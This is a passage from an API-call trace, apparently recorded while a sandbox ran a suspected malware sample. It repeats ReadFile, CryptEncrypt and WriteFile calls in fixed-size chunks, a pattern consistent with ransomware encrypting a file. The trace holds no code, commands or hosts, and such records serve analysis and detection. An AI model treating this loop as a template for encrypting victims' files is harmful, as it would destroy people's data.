lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.068] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.069] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.069] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.070] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.070] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.071] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.071] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.072] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.072] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.073] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.073] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.074] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.074] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, 